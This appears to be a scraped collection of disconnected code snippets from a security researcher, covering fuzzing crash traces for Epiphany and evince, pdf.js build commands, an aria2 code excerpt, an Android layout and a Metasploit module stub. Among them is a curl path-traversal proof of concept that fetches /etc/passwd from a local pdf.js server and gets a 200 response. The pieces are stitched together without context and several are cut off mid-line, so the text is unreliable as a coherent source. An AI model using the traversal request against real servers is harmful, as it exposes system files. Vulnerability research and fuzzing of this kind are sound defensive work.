RootUp

Identified by BFuzz (https://github.com/rootup/bfuzz)
Product: Web epiphany 3.28.1

Trace:
===Thread 29 "pool" received signal SIGSEGV, Segmentation fault.===
[Switching to Thread 0x7fff4ffff700 (LWP 28046)]
0x00007ffff7b75db7 in ?? () from /usr/lib/x86_64-linux-gnu/epiphany-browser/libephymain.so
#0  0x00007ffff7b75db7 in  () at /usr/lib/x86_64-linux-gnu/epiphany-browser/libephymain.so
#1  0x00007ffff7078c96 in  () at /usr/lib/x86_64-linux-gnu/libgio-2.0.so.0
#2  0x00007ffff73fe850 in  () at /usr/lib/x86_64-linux-gnu/libglib-2.0.so.0

RootUp

$ afl-fuzz -i in/ -o out/ ./binary @@ /dev/null

RootUp

(gdb) run NullPointer.h_134
Starting program: /usr/bin/evince NullPointerDeference.h_134
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
[New Thread 0x7fd84d3cf700 (LWP 17587)]
[New Thread 0x7fd84cbce700 (LWP 17588)]
[New Thread 0x7fd84718c700 (LWP 17589)]
[New Thread 0x7fd84651c700 (LWP 17594)]
[New Thread 0x7fd845b0e700 (LWP 17596)]
[New Thread 0x7fd83223e700 (LWP 17597)]

RootUp

$ git clone https://github.com/mozilla/pdf.js.git
$ cd pdf.js
$ npm install -g gulp-cli
$ npm install
$ gulp server

RootUp

gulp.task('baseline', function (done) {
  console.log();
  console.log('### Creating baseline environment');

  var baselineCommit = process.env['BASELINE'];
  if (!baselineCommit) {
    done(new Error('Missing baseline commit. Specify the BASELINE variable.'));
    return;
  }

RootUp

input0@zero:~/Desktop/pdf.js$ gulp server
[11:58:49] Using gulpfile ~/Desktop/pdf.js/gulpfile.js
[11:58:49] Starting 'server'...

### Starting local server
Server running at http://localhost:8888/

RootUp

input0@zero:~$ curl --path-as-is -v http://127.0.0.1:8888/../../../../../../etc/passwd
*   Trying 127.0.0.1...
* TCP_NODELAY set
* Connected to 127.0.0.1 (127.0.0.1) port 8888 (#0)
> GET /../../../../../../etc/passwd HTTP/1.1
> Host: 127.0.0.1:8888
> User-Agent: curl/7.58.0
> Accept: */*
> 
< HTTP/1.1 200 OK

RootUp

# https://github.com/aria2/aria2/blob/37368130ca7de5491a75fd18a20c5c5cc641824a/src/HttpConnection.cc
std::string result;
std::string line;
while (getline(istr, line)) {
   if (util::startsWith(line, "Authorization: Basic")) {
   result += "Authorization: Basic ********\n";
  }
  else if (util::startsWith(line, "Proxy-Authorization: Basic")) {
  result += "Proxy-Authorization: Basic ********\n";
  }

RootUp

<android.support.design.widget.CoordinatorLayout android:orientation="vertical" android:layout_width="fill_parent" android:layout_height="fill_parent" app:layout_behavior="@string/appbar_scrolling_view_behavior"
  xmlns:android="http://schemas.android.com/apk/res/android" xmlns:app="http://schemas.android.com/apk/res-auto">
    <FrameLayout android:layout_width="fill_parent" android:layout_height="fill_parent">
        <LinearLayout android:orientation="vertical" android:background="@color/white" android:layout_width="fill_parent" android:layout_height="fill_parent">
            <LinearLayout android:orientation="vertical" android:id="@id/ll_title_lock_setting" android:background="@color/feature_setting_background" android:visibility="gone" android:layout_width="fill_parent" android:layout_height="wrap_content">
                <LinearLayout android:orientation="horizontal" android:paddingTop="@dimen/y4" android:layout_width="fill_parent" android:layout_height="wrap_content">
                    <TextView and

RootUp

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpServer

def run
    exploit # start http server
  end

  def setup
    @html = %|
                   JS goes here!